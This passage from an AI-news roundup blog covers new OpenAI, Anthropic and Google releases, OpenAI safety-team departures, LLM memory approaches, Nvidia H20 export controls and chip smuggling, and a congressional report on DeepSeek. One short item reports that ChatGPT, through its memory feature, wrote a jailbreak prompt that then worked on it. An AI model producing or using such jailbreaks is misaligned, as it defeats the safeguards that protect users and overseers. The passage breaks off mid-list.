OpenAI has upgraded its entire suite of models. By all reports, they are back in the game for more than images.

GPT-4.1 and especially GPT-4.1-mini are their new API non-reasoning models. All reports are that GPT-4.1-mini especially is very good.

o3 is the new top of the line ChatGPT reasoning model, with o3-pro coming in a few weeks. Reports are that it too looks very good, even without us yet taking much advantage of its tool usage. If you have access, check it out. Full coverage is coming soon. There’s also o4-mini and o4-mini-high.

Oh, they also made ChatGPT memory cover all your conversations, if you opt in, and gave us a version of Claude Code called Codex. And an update to their preparedness framework that I haven’t had time to examine yet.

Anthropic gave us (read-only for now) Google integration (as in GMail and Calendar to complement Drive), and also a mode known as Research, which would normally be exciting but this week we’re all a little busy.

Google and everyone else also gave us a bunch of new stuff. The acceleration continues.

Not covered yet, but do go check them out: OpenAI’s o3 and o4-mini.

Previously this week: GPT-4.1 is a Mini Upgrade, OpenAI #13: Altman at TED and OpenAI Cutting Corners on Safety Testing.

- Language Models Offer Mundane Utility. But doctor, you ARE ChatGPT!
- Language Models Don’t Offer Mundane Utility. Cuomo should have used o3.
- Huh, Upgrades. ChatGPT now has full memory across conversations.
- On Your Marks. A new benchmark for browsing agents.
- Research Quickly, There’s No Time. Just research. It’s cleaner. Check your email.
- Choose Your Fighter. Shoutouts to Google-AI-in-search and Mistral-Small-24B?
- Deepfaketown and Botpocalypse Soon. Building your own AI influencer.
- The Art of the Jailbreak. ChatGPT can now write its own jailbreaks.
- Get Involved. Study with UT Austin, or work for Ted Cruz. We all make choices.
- Introducing. Google offers agent development kit, OpenAI copies Claude Code.
- In Other AI News. Oh no, please, not another social network.
- Come on OpenAI, Again? Funny what keeps happening to the top safety people.
- Show Me the Money. Thinking Machines and SSI.
- In Memory Of. Ways to get LLMs real memory?
- Quiet Speculations. What even is AGI anyway, and other questions.
- America Restricts H20 Sales. We did manage to pull this one out.
- House Select Committee Report on DeepSeek. What they found was trouble.
- Tariff Policy Continues To Be How America Loses. It doesn’t look good.
- The Quest for Sane Regulations. Dean Ball joins the White House, congrats man.
- The Week in Audio. Hassabis, Davidson and several others.
- Rhetorical Innovation. No need to fight, they can all be existential dangers.
- Aligning a Smarter Than Human Intelligence is Difficult. Working among us.
- AI 2027. Okay, fair.
- People Are Worried About AI Killing Everyone. Critch is happy with A2A.
- The Lighter Side. The numbers are scary. The words are scarier.

Figure out what clinical intuitions convert text reports to an autism diagnosis. The authors were careful to note this was predicting who would be diagnosed, not who actually has autism.

Kate Pickert asserts in Bloomberg Why AI is Better Than Doctors at the Most Human Part of Medicine. AI can reliably express sympathy to match the situation, is always there to answer and doesn’t make you feel pressured or rushed. Even the gung ho doctors are still saying things like ‘AI is not going to replace physicians, but physicians who know how to use AI are going to be at the top of their game going forward’ and saying how it ‘will allow doctors to be more human,’ and the article calls that an ‘ideal state.’ Isn’t it amazing how every vision of the future picks some point where it stops?

The US Government is deploying AI to clean up its personnel records and correct inaccurate information. That’s great if we do a good job.

Translate dolphin vocalizations?

Pin down where photographs were taken. It seems to be very good at this.

Henry: ten years ago the CIA would have gotten on their knees for this. every single human has just been handed an intelligence superweapon. it’s only getting stranger

This may mean defense will largely beat offense on deepfakes, if one has a model actually checking. If I can pinpoint exact location, presumably I can figure out when things don’t quite add up.

Andrew Cuomo used ChatGPT for his snoozefest of a vacuous housing plan, which is fine except he did not check its work.

Hell Gate: Andrew Cuomo used ChatGPT to help write the housing plan he released this weekend, which included several nonsensical passages. The plan even cites to ChatGPT on a section about the Rent Guidelines Board.

He also used ChatGPT for at least two other proposals. It’s actively good to use AI to help you, but this is not that. He didn’t even have someone check its work.

If New York City elects Andrew Cuomo as mayor we deserve what we will get.

What else isn’t AI doing for us?

Matthew Yglesias: AI is not quite up to the task of “make up a reason for declining a work-related invitation that will stand up to mild scrutiny, doesn’t make me sound weird, and is more polite than ‘I don’t want to do it.’”

Tyler Cowen: Are you sure?

I think AI is definitely up to that task to the extent it has sufficient context to generate a plausible reason. Certainly it can do an excellent job of ‘use this class of justification to generate a maximally polite and totally non-weird reply.’



As usual, the best way to not get utility is not to use them, fraudulent company edition.

Peter Wildeford: I guess fake it until you make it, do things that don’t scale, etc. only works to a point.

Nico: Ship fast, break things, (go to jail)

I don’t think ‘create human call centers in order to get market share and training data to then make them into AI call centers’ is even a terrible startup idea. The defrauding part did run into a little trouble.

A technical analysis of some fails by Claude Plays Pokemon, suggesting issues stemming from handling and management of long context. This both suggests ways to improve Claude in general, and ways one could improve the scaffolding and allow Claude to play superior Pokemon (without ‘cheating’ or otherwise telling it about the game in any specific way.)

Apple’s demo of Siri’s new abilities to access reader emails and find real-time flight data and plot routes in maps came as news to the people working on Siri. In general MacRumors paints a picture of a deeply troubled and confused AI effort at Apple, with eyes very much not on the ball.

ChatGPT memory now extends to the full contents of all your conversations. You can opt out of this. You can also do incognito windows that won’t interact with your other chats. You can also delete select conversations.

Noam Brown: Memory isn’t just another product feature. It signals a shift from episodic interactions (think a call center) to evolving ones (more like a colleague or friend).

Still a lot of research to do but it’s a step toward fundamentally changing how we interact with LLMs.

This shift has its disadvantages. There’s a huge freedom and security and ability to relax when you know that an interaction won’t change things overall. When you interact with a human, there’s always this kind of ‘social calculator’ in the back of your brain whether you’re conscious of it or not, and oh my is it a relief to turn it off. I hate that now when I use so many services, I have to worry in that same way about ‘what my actions say about me’ and how they influence what I will see in the future. It makes it impossible to fully relax. Being able to delete chats helps, but not fully.

My presumption is you still very much want this feature on. Most of the time, memory will be helpful, and it will be more helpful if you put in effort to make it helpful – for example it makes sense to offer feedback to ChatGPT about how it did and what it can do better in the future, especially if you’re on $200/month and thus not rate limited.

I wonder if it is now time to build a tool to let one easily port their chat histories between various chatbots? Presumably this is actually easy, you can copy over the entire back-and-forth with and tags and paste it in, saying ‘this is so you can access these other conversations as context’ or what not?
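Here is a minimal sketch of what that porting step could look like. The tag names (`<user>`, `<assistant>`), the function name `render_transcript` and the exact wording of the header are my assumptions for illustration, not any chatbot's official export or import format.

```python
from typing import Iterable, Tuple

# Hypothetical role names; real export formats may label turns differently.
ALLOWED_ROLES = ("user", "assistant")


def render_transcript(
    messages: Iterable[Tuple[str, str]],
    source: str = "another chatbot",
) -> str:
    """Render (role, text) pairs as one tagged block you can paste into a new chat."""
    lines = [
        f"This is a past conversation from {source}, "
        "included so you can access it as context.",
        "",
    ]
    for role, text in messages:
        if role not in ALLOWED_ROLES:
            raise ValueError(f"unknown role: {role!r}")
        # Wrap each turn in an opening and closing tag named after the speaker.
        lines.append(f"<{role}>")
        lines.append(text.strip())
        lines.append(f"</{role}>")
    return "\n".join(lines)


if __name__ == "__main__":
    history = [
        ("user", "What is a good name for a weekly AI newsletter?"),
        ("assistant", "How about a simple numbered series?"),
    ]
    print(render_transcript(history, source="ChatGPT"))
```

The output is plain text, so it works with anything that accepts a paste. Whether the receiving model makes good use of a very long pasted history is a separate question.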

Anna Gat is super gung ho on memory, especially on it letting ChatGPT take on the role of therapist. It can tell you your MBTI and philosophy and lead you to insights about yourself and take different points of view and other neat stuff like that. I am skeptical that doing this is the best idea, but different people work differently.

Like Sean notes, my wife uses my account too (I mean it’s $200/month!) and presumably that’s going to get a bit confusing if you try things like this.

Gemini 2.5 Pro was essentially rushed into general availability before its time, so we should still expect it to improve soon when we get the actual intended general availability version, including likely getting a thinking budget similar to what is implemented in Gemini 2.5 Flash.

Google upgrades AI Studio (oh no?), they list key improvements as:

- New Starter Apps.
- Refined Prompting Interface, persistent top action bar for common tasks.
- Dedicated Developer Dashboard including API keys and changelog.

A quick look says what they actually did was mostly ‘make it look and feel more like a normal chat interface.’



My feedback is they don’t do a good job here explaining the value proposition, and what differentiates it from other offerings or from Embed 3. It seems like it is… marginally better at search and retrieval? But they don’t give me a way to feel what they uniquely enable, or where this will outperform.

ChatGPT will have all your images in one place. A small thing, but a good thing.

Grok gives us Grok Studio, offering code execution and Google Drive support.

LM Arena launches a ‘search Arena’ leaderboard, Gemini 2.5 Pro is on top with Perplexity-Sonar-Reasoning-Pro (high) slightly behind on presumably more compute.

OpenAI introduces BrowseComp, a 1,266 question benchmark for browsing agents. From looking at sample questions they provide this is extremely obscure inelegant trivia questions, except you’ll be allowed to use the internet? As in:

Give me the title of the scientific paper published in the EMNLP conference between 2018-2023 where the first author did their undergrad at Dartmouth College and the fourth author did their undergrad at University of Pennsylvania. (Answer: Frequency Effects on Syntactic Rule Learning in Transformers, EMNLP 2021)

I mean, yeah, okay, that is a test one could administer I suppose, but why does it tell us much about how good you are as a useful browsing agent?

When asking about ‘1 hour tasks’ there is a huge gap between ‘1 hour given you know the context’ versus ‘1 hour once given this spec.’

Charles Foster: Subtle point [made in this post]: there’s a huge difference between typical tasks from your job that take you 1 hour of work, and tasks that a brand new hire could do in their first hour on the job. Most “short” tasks you’ve done probably weren’t standalone: they depended on tons of prior context.

A lot of getting good at using LLMs is figuring out how, or doing the necessary work, to give them the appropriate context. That includes you knowing that context too.



How badly did Llama-4 go? This badly:

Casper Hansen: Llama 4 quietly dropped from 1417 to 1273 ELO, on par with DeepSeek v2.5.

Previously, Llama-4 took second place in Arena with an intentionally sloppified version optimized for Arena. That’s gone now, we are testing the actual Llama-4-Maverick, and shall we say it’s not going great.

Here’s a very bullish report on Gemini 2.5 Pro (prior to the release of o3):

Leo Abstract: there’s been a lot going on lately and i neglected to chime in earlier and say that gemini 2.5 pro absolutely crushes the private benchmarks i’d been using until now, in a new way and to a new extent.

i’m going to need a bigger benchmark.

Well, well, what do we have here.

Anthropic: Today we’re launching Research, alongside a new Google Workspace integration.

Claude now brings together information from your work and the web.

Research represents a new way of working with Claude.

It explores multiple angles of your question, conducting searches and delivering answers in minutes.

The right balance of depth and speed for your daily work.

Claude can also now connect with your Gmail, Google Calendar, and Docs.

It understands your context and can pull information from exactly where you need it.

Research is available in beta for Max, Team, and Enterprise plans in the United States, Japan, and Brazil.

Separately, the Google Workspace integration is now available for all paid plans.

Oh. My. God. Huge if true! And by true I mean good at job.

I’m excited for both features, but long term I’m more excited for Google integration than for research. Yes, this should 100% be Gemini’s You Had One Job, but Gemini is not exactly nailing it, so Claude? You’re up. Right now it’s read-only, and it’s been having trouble finding things and having proper access in my early tests, but I’m waiting until I try it more. Might be a few bugs to work out here.

Anthropic: We’ve crafted some prompt suggestions that help you quickly get insights from across your Google Workspace.

After turning it on, try: “Reflect on my calendar as if I was 100 years old looking back at this time.”

Just tried “Claude Research”, it’s much faster (takes <1min) but much weaker than Gemini's and ChatGPT's "Deep Research" (fails to find key facts and sources that Gemini/ChatGPT do).

I think it’s a great replacement for a Google quick dive but not for serious research.

Claude integration with Google apps seems potentially awesome and I’d be curious how it compares against Gemini (which is surprisingly weak in this area given the home field advantage)

But alas “Claude for Google Drive is not approved by Advanced Protection” so can’t yet try it. Still, I expect to use this a lot.

Also LOL in the video how everyone compliments the meticulous sabbatical planning even though it was just a Claude copy+paste.

John Pressman says people are sleeping on Mistral-Small-24B, and in particular it speeds up his weave-agent project dramatically (~10x). Teortaxes asks about Reka-21B. There’s this entire other ecosystem of small open models I mostly don’t cover.

Liron Shapira is liking the new version of Google AI-in-search given its integration of web content and timely news. I’m not there yet.

The general case of this is my biggest complaint about Gemini 2.5 Pro.

Agus: Gemini 2.5 Pro seems to systematically refuse me when I ask it to provide probabilities for things, wut

Max Alexander: True human level capabilities.

An advertisement for tools to build an AI influencer on Instagram and OnlyFans. I mean, sure, why not. The problem is demand side, not supply side, as they say.

You can use AI to create bad new Tom & Jerry cartoons, I guess, if you want to?

With its new memory feature, Pliny found that ChatGPT wasn’t automatically jailbroken directly, but it did give Pliny a jailbreak prompt, and the prompt worked.

US Senate Employment Office: Chairman #TedCruz seeks a #conservative #counsel to join the #Republican staff of the #Senate #Commerce Committee to lead on #artificialintelligence #policy. Job referral #231518

In all seriousness this seems like a high leverage position for someone who understands AI and especially AI existential risk. Ted Cruz has some very large confusions about AI related matters. As a result he is attempting to do some highly damaging things. We also have our disagreements, but a lot of it is that he seems to conflate ethics and wokeness concerns with notkilleveryoneism concerns, and generally not understand what is at stake or what there is to worry about. One can join his team, sincerely help him, and also help explain this.

If you do go for this one, thank you for your service.

Anthropic is looking for a genius prompt engineer for Model Behavior Architect, Alignment Fine Tuning.

Scott Aaronson is building an OpenPhil backed AI alignment group at UT Austin, prospective postdocs and PhD students in CS should apply ASAP for jobs starting as soon as August. You’ll need your CV, links to representative publications and two recommendation letters, you can email Chandra.

AI Innovation & Security Policy Workshop in Washington DC, July 11-13, apply by May 4th. All travel and accommodation expenses covered, great speaker lineup, target is US citizens considering careers in AI policy.

UK AISI is funding alignment research, you can fill out a 5-minute contract form.

80,000 Hours Podcast is making a strategic shift to focus on AGI, and looking to grow its team with a third host/interviewer (!) and a chief of staff, deadline is May 6.

Google presents the Agent Development Kit (ADK) (GitHub download, ReadMe).

Code-First Development: Define agents, tools, and orchestration logic for maximum control, testability, and versioning.

Multi-Agent Architecture: Build modular and scalable applications by composing multiple specialized agents in flexible hierarchies.

Rich Tool Ecosystem: Equip agents with diverse capabilities using pre-built tools, custom Python functions, API specifications, or integrating existing tools.

Flexible Orchestration: Define workflows using built-in agents for predictable pipelines, or leverage LLM-driven dynamic routing for adaptive behavior.

Integrated Developer Experience: Develop, test, and debug locally with a CLI and visual web UI.

Built-in Evaluation: Measure agent performance by evaluating response quality and step-by-step execution trajectory.

Deployment Ready: Containerize and deploy your agents anywhere – scale with Vertex AI Agent Engine, Cloud Run, or Docker.

Native Streaming Support: Build real-time, interactive experiences with native support for bidirectional streaming (text and audio).

State, Memory & Artifacts: Manage short-term conversational context, configure long-term memory, and handle file uploads/downloads.

Extensibility: Customize agent behavior deeply with callbacks and easily integrate third-party tools and services.

pip install google-adk

OpenAI offers us Codex CLI, a feature adopted from Claude. This is open source so presumably you could try plugging in Claude or Gemini. It runs from the command line and can do coding things or ask questions about files based on a natural language request, up to and including building complete apps from scratch in ‘full auto mode,’ which is network disabled and sandboxed to its directory.

Noam Brown (OpenAI): I now primarily use codex for coding. @fouadmatin and team did an amazing job with this!

Austen Allred: An anecdotal survey of GauntletAI grads came to the consensus that staying on the cutting edge of AI takes about one hour per day.

Yes, per day.

How long it takes depends what goals you have, and which cutting edges they include. It seems highly plausible that ‘be able to apply AI at the full cutting edge at maximum efficiency’ is one hour a day. That’s a great deal, and also a great deal.

OpenAI is working on a Twitter-like social network. Unfortunately, I checked and the name Twitter is technically not available, but since when has OpenAI cared about copyright law? Fingers crossed!

Mostly they’re crossed hoping OpenAI does not do this. As in, the world as one says please, Sam Altman, humanity is begging you, you do not have to do this. Then again, I love Twitter to death, currently Elon Musk is in charge of it, and if there is going to be a viable backup plan for it I’d rather it not be Threads or BlueSky.

OpenAI offers an update to its preparedness framework. I will be looking at this in more detail later, for now simply noting that this exists.

Anthropic, now that it has Google read-only integration and Research, is reportedly next going to roll out a voice mode, ‘as soon as this month.’

New DeepMind paper uses subtasks, and whether capabilities get used towards a given goal, to measure goal directedness. As we already knew, LLMs often ‘fail to employ their capabilities’ and are not ‘fully goal-directed’ at this time, although we are seeing them become more goal directed over time. I note the goalpost move (not the paper’s fault!) from ‘LLMs don’t have goals’ to ‘LLMs don’t maximally pursue the goals they have.’

Well, this doesn’t sound awesome, especially on top of what else we learned recently. It seems we’ve lost another head of the Preparedness Framework. It does seem like OpenAI has not been especially prepared on these fronts lately. When GPT-4.1 was released we got zero safety information of any kind that I could find.

Garrison Lovely: 🚨BREAKING🚨 OpenAI’s top official for catastrophic risk, Joaquin Quiñonero Candela, quietly stepped down weeks ago — the latest major shakeup in the company’s safety leadership. I dug into what happened and what it means.

Candela, who led the Preparedness team since July, announced on LinkedIn he’s now an “intern” on a healthcare team at OpenAI.

A company spokesperson told me Candela was involved in the successor framework but is now “focusing on different areas.”

This marks the second unannounced leadership change for the Preparedness team in less than a year. Candela took over after Aleksander Mądry was quietly reassigned last July — just days before Senators wrote to Sam Altman about safety concerns.

Candela’s departure is part of a much larger trend. OpenAI has seen an exodus of top safety talent over the past year, including cofounder John Schulman, safety lead Lilian Weng, Superalignment leads Ilya Sutskever & Jan Leike, and AGI readiness advisor Miles Brundage.

When Leike left, he publicly stated that “safety culture and processes have taken a backseat to shiny products” at OpenAI. Miles Brundage cited publishing constraints and warned that no company is ready for artificial general intelligence (AGI).

With key safety leaders gone, OpenAI’s formal governance is crucial but increasingly opaque. Key members of the board’s Safety and Security Committee are gone, and the members of a new internal “Safety Advisory Group” (SAG) haven’t been publicly identified.

An OpenAI spox told me that Sandhini Agarwal has been leading the safety group for 2 months, but that information hadn’t been announced or previously reported. Given how much OpenAI has historically emphasized AI safety, shouldn’t we know who is in charge of it?

A former employee wrote to me, “Even while working at OpenAI, details about safety procedures were very siloed. I could never really tell what we had promised, if we had done it, or who was working on it.”

This pattern isn’t unique to OpenAI. Google still hasn’t published a safety report for Gemini 2.5 Pro, arguably the most capable model available, in likely violation of the company’s voluntary commitments.

Mira Murati’s Thinking Machines has doubled their fundraising target to $2 billion, and the team keeps growing, including Alec Radford. I expect them to get it.

Ilya Sutskever’s SSI now valued at $32 billion. That is remarkably high.

Matt Turck: Hearing rumors of massive secondaries in some of those huge pre-product AI rounds. Getting nervous that the level of risk across the AI industry is getting out of control. No technology even revolutionary can live up in the short term to this level of financial excess.

James Campbell: As far as I know, there are four main ways we could get LLM memory:

1. We could simply use very long contexts, and the context grows over an instance’s “lifetime”; optionally, we could perform iterative compression or summarization.

2. A state-space model that keeps memory in a constant-size vector.

3. Each context is a “day.” Then, the model is retrained each “night” on the day’s data so that it has long-term knowledge of what happened (just as humans sleep).

4. Retrieval Augmented Generation (RAG) on text or state vectors, and the RAG performs sophisticated operations such as reflection or summarization in the background. Perhaps reinforce the model to use the scaffold extremely skillfully.

Are there any methods I missed?

I’m surprised labs don’t take the “fine-tune user-specific instances” route. Infrastructurally, it might be hard, but I’m holding out hope that Thinky might do this.

Gallabytes: very bullish on 3, interested in how far lightweight approximations can go via 2, and super bearish on 1.

4 is orthogonal. Taking notes seems good.

I am also highly bearish on #1 and throwing everything into context, you’d be much better off in a #4 scenario at that point unless I’m missing something. The concept on #3 is intriguing, I’d definitely be curious to see it tried more. In theory you could also update the weights continuously, but I presume that would slow you down too much, which also is presumably why humans do it this way?

Gideon Lichfield is mostly correct that ‘no one knows’ what the term ‘artificial general intelligence’ or AGI means. Mostly we have a bunch of different vague definitions at best. Lichfield does a better job than many of taking future AI capabilities seriously and understanding that everyone involved is indeed pointing at real things, and of noticing that “most of the things AI will be capable of, we can’t even imagine today.” Gideon does also fall back on several forms of copium, like intelligence not being general, or the need to ‘challenge conventional wisdom,’ or that to think like a human you have to do the things humans do (e.g. sleep (?), eat (?!), have sex (what?) or have exactly two arms (???)).

Vladimir Nesov argues that even if timelines are short and your work’s time horizon is long, that means your alignment (or other) research gets handed off to AIs, so any groundwork you can lay remains helpful.

Robin Hanson once again pitches that AI impacts will be slow and take decades, this time based on previous GPTs (general purpose technologies) taking decades. Sometimes I wonder about an alternative Hanson who is looking for Hansonian reasons AI will go fast. Claude’s version of this seemed uninspired.

Paul Graham: The AI boom is not just probably bigger than the two previous ones I’ve seen (integrated circuits and the internet), but also seems to be spreading faster.

It took a while for society to “digest” integrated circuits and the internet in the sense of figuring out all the ways they could be used. This seems to be happening faster with AI. Maybe because so many uses of intelligence are already known.

For sure there will be new uses of AI as well, perhaps more important than the ones we already know about. But we already know about so many that existing uses are enough to generate rapid growth.

Over 90% of the code being written by the latest batch of startups is written by AI. Sold now?

Another way of putting this is, yes being a GPT means that the full impact will take longer, but there being additional impact later doesn’t mean less impact soon.

Tyler Cowen says it’s nonsense that China is beating us, and the reason is AI, which he believes will largely favor America due to all AIs having ‘souls rooted in the ideals of Western Civilization,’ due to being trained primarily on Western data, and this is ‘far more radical’ than things like tariff rates and more important than China’s manufacturing prowess.

I strongly agree that AI likely strongly favors the United States (although mostly for other reasons), and that AI is going to be big, really big, no bigger than that, it’s going to be big. It is good to see Tyler affirm his belief in both of these things.

I will however note that if AI is more important than tariffs, then what was the impact of tariff rates on GDP growth again? Credible projections for RGDP growth for 2025 were often lowered by several percent on news of the tariffs. I find these projections reasonable, despite widespread anticipation that mostly the tariffs will be rolled back. So, what does that say about the projected impact of AI, if it’s a much bigger deal?

Also, Tyler seems to be saying the future is going to be shaped primarily by AIs, but he’s fine with that because they will be ‘Western’? And thus it will be a triumph of ‘our’ soft power? No, they will soon be highly alien, and the soft power will not be ours. It will be theirs.

(I also noticed him once again calling Manus a ‘top Chinese AI model,’ a belief that at this point has to be a bizarre anachronism or something? The point that it was based on Claude is well taken.)



We are going to be at least somewhat smarter about the selling China AI chips part. It turns out this time we didn’t actually fully sell out for a $1 million Mar-a-Lago dinner.

Samuel Hammond (last week, infamously and correctly, about our being about to let China buy H20s): what the actual fuck.

Thomas Hochman: Finally, an answer to the question: What if we made our AI companies pay a tariff on a chip that we designed but also ended export control restrictions.

Peter Wildeford: Why does banning the H20 matter?

Current US chip export controls focus on China’s ability to TRAIN frontier AI models.

But it’s now INFERENCE that is becoming the central driver of AI innovation through reasoning models, agentic AI, and automated research.

…

By restricting the H20 NOW, the US can limit China’s inference hardware accumulation before it becomes the dominant compute paradigm.

Matthew Yglesias: We’re doing a form of trade war with China where half the stuff normal Americans buy will get more expensive, but China still gets access to the leading edge technology they need to dominate AI and whatever else.

Jason Hausenloy (link to full article): Exporting H20 Chips to China Undermines America’s AI Edge.

Good news, everyone! We did it. We restricted, at least for now, sales of the H20.

We know it will actually impact chip flows because Nvidia filed to expect $5.5 billion in H20-related charges for Q1 (for now) and traded 6% down on the news.

Last week’s announcement may have been a deliberate leak as an attempt to force the administration’s hand. If so, it did not work.

We still have to sustain this decision. It is far from final, and no doubt Nvidia will seek a license to work around this, and will redesign its chips once again to maximally evade our restrictions.

Also, they will look the other way while selling chips elsewhere. Jensen is not the kind of CEO who cooperates in spirit. Which leads to our other problem, that we are decimating BIS rather than strengthening BIS. What good are our restrictions if we have no way to enforce them?

Ben Thompson is the only person I’ve seen disagree with the restrictions on the H20. That position was overdetermined because he opposes all the export controls and thinks keeping people locked in the CUDA ecosystem is more important than who has better AIs or compute access. He consistently has viewed AI as another tech platform play, as I’ve discussed in the past, especially when dissecting his interview with Altman, where he spent a lot of it trying to convince Altman to move to an advertising model.

Ben’s particular claim was that the H20 is so bad that no one outside China would want them, thus they have to write off $5.5 billion. That’s very clearly not the case. Nvidia has to write off the $5.5 billion as a matter of accounting, whether or not they ultimately sell the chips in the West. There are plenty of buyers for H20s, and as my first test of o3 it confirmed that the chips would absolutely sell in the Western markets well above their production costs, it estimates ~$10 billion total. Which means that not only does China get less compute, we get more compute.

Nvidia is definitely worth less than if they were allowed to sell China better AI chips, but they can mostly sell whatever chips they can make. I am not worried for them.

How is BIS enforcement going right now?

Aidan O’Gara: So excited to see the next batch of models out of Malaysia.

Kakashii: Nvidia Chip Shipments to Malaysia Skyrocket to Record Highs Despite U.S. Warnings — March 2025 Update

On March 23, 2025, the Financial Times reported that U.S. officials asked Malaysia to monitor every shipment entering the country when it involves Nvidia chips. “[The U.S. is] asking us to make sure that we monitor every shipment that comes to Malaysia when it involves Nvidia chips”, Malaysian Trade Minister Zafrul Aziz said.

But did Malaysia really start the monitor and crackdown? Let’s assume U.S. officials approached Malaysian officials about a week before the FT published the report—which means Malaysia had half a month to start monitoring. That’s plenty of time to change the picture of the flows. I assume.

…

So what did they do when the Singapore tunnel was about to close? Yep, you guessed right—boost Malaysia’s role in this routing.

Malaysia is now dominating the Nvidia chip flow into Asia, and March has officially taken the crown as the biggest month ever for shipments to the country.

Let’s talk numbers:

2022: $817 million

2023: $1.276 billion

2024: $4.877 billion — an increase of almost 300% YoY

2025:

January: $1.12 billion (!) — nearly 700% year-over-year increase (!)

February: $626.5 million

March: a record-breaking $1.96 billion (!) — an astonishing 3,433% increase from 2023 to 2025 (!)

Total GPU flow from Taiwan to Malaysia in Q1 2025? $3.71 billion. If we take Nvidia’s estimated total revenue for Q1, Malaysia’s shipments alone make up almost 10% of the company’s estimated revenue in Q1 (!).

As in, Nvidia is getting 10% of their Q1 2025 revenue selling chips to China in direct violation of the export controls. And we are doing approximately nothing about it.
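If you want to sanity check the arithmetic in those quoted numbers, here is a minimal sketch in Python. The dollar figures are the ones quoted above. The implied revenue figure is only what ‘almost 10%’ would require, which is my own back-of-envelope assumption and not a number reported by Nvidia or Kakashii.

```python
# Shipment values quoted above, in millions of USD.
annual = {2022: 817.0, 2023: 1276.0, 2024: 4877.0}
q1_2025 = {"January": 1120.0, "February": 626.5, "March": 1960.0}


def pct_increase(old: float, new: float) -> float:
    """Percentage increase going from old to new."""
    return (new - old) / old * 100.0


q1_total = sum(q1_2025.values())
yoy_2024 = pct_increase(annual[2023], annual[2024])

# ASSUMPTION: if Q1 shipments are "almost 10%" of revenue, then revenue must
# be somewhat above ten times the Q1 total. This is a floor implied by the
# quote, not a reported revenue figure.
implied_revenue_floor = q1_total / 0.10

print(f"Q1 2025 total: ${q1_total / 1000:.2f}B")
print(f"2023 -> 2024 increase: {yoy_2024:.0f}%")
print(f"Implied Q1 revenue floor: ${implied_revenue_floor / 1000:.1f}B")
```

The three monthly figures do sum to about $3.71 billion, and 2023 to 2024 works out to roughly a 282% increase, consistent with ‘almost 300%.’ The March 3,433% figure cannot be checked from what is quoted, since no monthly 2023 baseline is given.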

In related news, The House Select Committee on the CCP has issued a report entitled “DeepSeek Unmasked: Exposing the CCP’s Latest Tool For Spying, Stealing, and Subverting U.S. Export Control Restrictions.”

I am glad they are paying attention to the situation, especially the issues with American export controls. Many of their proposed interventions are long overdue, and several proposals are things we’d love to have but that we need to do work on to find a method of implementation.

What is dismaying is that they are framing AI danger entirely as a threat from the sinister PRC. I realize that is what the report is about, but one can tell that they are viewing all this purely in terms of our (very real and important to win) competition with the PRC, to the exclusion of other dangers.

This is clearly part of a push to ban DeepSeek, at least in terms of using the official app and presumably API. I presume they aren’t going to try and shut down use of the weights. The way things are presented, it’s not clear that everyone understands that this is mostly very much not about an app.

The report’s ‘key findings’ are very much in scary-Congressional-report language.

Key findings include:

Censorship by Design: More than 85% of DeepSeek’s responses are manipulated to suppress content related to democracy, Taiwan, Hong Kong, and human rights—without disclosure to users.

Foreign Control: DeepSeek is owned and operated by a CCP-linked company led by Lian Wenfang and ideologically aligned with Xi Jinping Thought.

U.S. User Data at Risk: The platform funnels American user data through unsecured networks to China, serving as a high-value open-source intelligence asset for the CCP.

Surveillance Network Ties: DeepSeek’s infrastructure is linked to Chinese state-affiliated firms including ByteDance, Baidu, Tencent, and China Mobile—entities known for censorship, surveillance, and data harvesting.

Illicit Chip Procurement: DeepSeek was reportedly developed using over 60,000 Nvidia chips, which may have been obtained in circumvention of U.S. export controls.

Corporate Complicity: Public records show Nvidia CEO Jensen Huang directed the company to design a modified chip specifically to exploit regulatory loopholes after October 2023 restrictions. The Trump Administration is working to close this loophole.

They also repeat the accusation that DeepSeek was distilling American models.

A lot of these ‘key findings’ are very much You Should Know This Already, presented as something to be scared of. Yes, it is a Chinese company. It does the mandated Chinese censorship. It uses Chinese networks. It might steal your user data. Who knew? Oh, right, everyone.

The more interesting claims are the last two.

(By the way, ‘DeepSeek was developed?’ I get what you meant to say, but: Huh?)

We previously dealt with claims of 50k Nvidia chips, now it seems it is 60k. They are again citing SemiAnalysis. It’s definitely true that this was reported, but it seems unlikely to actually be true. Also note that their 60k chips here include 30k H20s, and the report makes clear that by ‘illegal chip’ procurement they are including legal chips that were designed by Nvidia to ‘skirt’ export controls, and conflating this with potential actual violations of export restrictions.

In this sense, the claim on Corporate Complicity is, fundamentally, 100% true. Nvidia has repeatedly modified its AI chips to be technically in compliance with our export restrictions. As I’ve said before and said above, they have zero interest in cooperating in spirit and are treating this as an adversarial game.

This also includes exporting to Singapore and now Malaysia in quantities very obviously too large for anything but the Chinese secondary market.

I don’t think this approach is going to turn out well for Nvidia. In an iterated game where the other party has escalation dominance, and you can’t even fully meet demand for your products, you might not want to constantly hit the defect button?

Kristina Partsinevelos: Nvidia response: “The U.S. govt instructs American businesses on what they can sell and where – we follow the government’s directions to the letter” […] “if the government felt otherwise, it would instruct us.”

Daniel Eth: Hot take but this is actually really dumb of Nvidia. USG has overarching goals here – by following the letter of the law but not the spirit, Nvidia is risking getting caught in the cross hairs of legal updates (as they just did) and giving up the opportunity to create good will.

If I was Nvidia I would be cooperating in spirit. And of course I’d be asking for quite a lot of consideration in exchange in various ways. I’d expect to get it. Alas.

The report recommends two sets of things. First, on export controls:

-

Improve funding for BIS. On this I am in violent agreement.

-

Further restrict the export controls, to include the H20 and also manufacturing equipment. We have not banned selling tools and subcomponents. This is potentially enabling Huawei to give China quite a lot of effective chips. Ben Thompson mentions this issue as well. So again, yes, agreed.

-

Impose remote access controls on all data center, compute cluster and models trained with the use of US-origin GPUs and other U.S.-origin data center accelerants, including but not limited to TPUs. I’d want to see details, as worded this seems to be a very extreme position.

-

Give BIS the ability to create definitions based on descriptions of capability, that can be used to describe AI models with national security significance. Yes.

-

Essentially whistleblower provisions on export control violations. Yes.

-

Consider requiring tracking end-users of chips and equipment. How?

-

Actually enforce our export controls against smuggling. Yes.

-

Require companies to install on-chip location verification capabilities in order to receive an export license for chips restricted from export to any country with a high risk of diversion to the PRC. A great idea subject to implementation issues. Do we have the capability to do this in a reasonable way? We should definitely be working on being able to do it.

-

“Ensure the secure and safe use of AI systems by directing a federal agency (e.g., NIST and AISI, CISA, NSA) to develop physical and cybersecurity standards and benchmarks for frontier AI developers to protect against model distillation, exfiltration, and other risks.” Violent agreement on exfiltration risks. On distillation, I must ask: How do you intend to do that?

-

